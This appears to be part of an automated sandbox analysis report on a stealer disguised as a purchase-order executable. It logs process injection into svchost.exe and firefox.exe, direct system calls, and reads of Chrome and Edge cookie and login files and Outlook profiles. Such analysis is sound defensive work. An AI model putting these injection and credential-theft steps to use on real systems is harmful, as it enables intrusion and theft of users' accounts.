            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00ABA937 GetProcessHeap
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AB8E19 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe; Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe protection: read write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Thread register set: target process: 5792
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Thread APC queued: target process: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Memory written: C:\Windows\SysWOW64\svchost.exe base: 30CF008
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00ACBE95 LogonUserW
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AD4B52 SendInput,keybd_event
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AD7DD5 mouse_event
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe"
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe; Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00ACB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00ACBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
            Source: Purchase Order TE- 00011-7777.exe, CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005CE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ProgmannailWindowifyAnimation Target0
            Source: CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: Purchase Order TE- 00011-7777.exe; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: CjeBlighAyoJst.exe, 00000003.00000002.3887405886.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000000.2158082247.0000000001921000.00000002.00000001.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318062748.0000000000F61000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AB7254 cpuid
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AB40DA GetSystemTimeAsFileTime,__aulldiv
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00B0C146 GetUserNameW
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe; Code function: 0_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
